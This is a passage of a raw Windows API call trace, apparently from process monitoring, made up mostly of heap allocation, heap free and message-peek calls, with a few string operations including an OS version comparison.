Size=0x20) returned 0x24b6d28 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.193] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.193] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.194] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.194] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.194] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.195] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.196] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.197] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.198] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0190.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.200] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.200] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.200] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.201] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.201] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.201] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 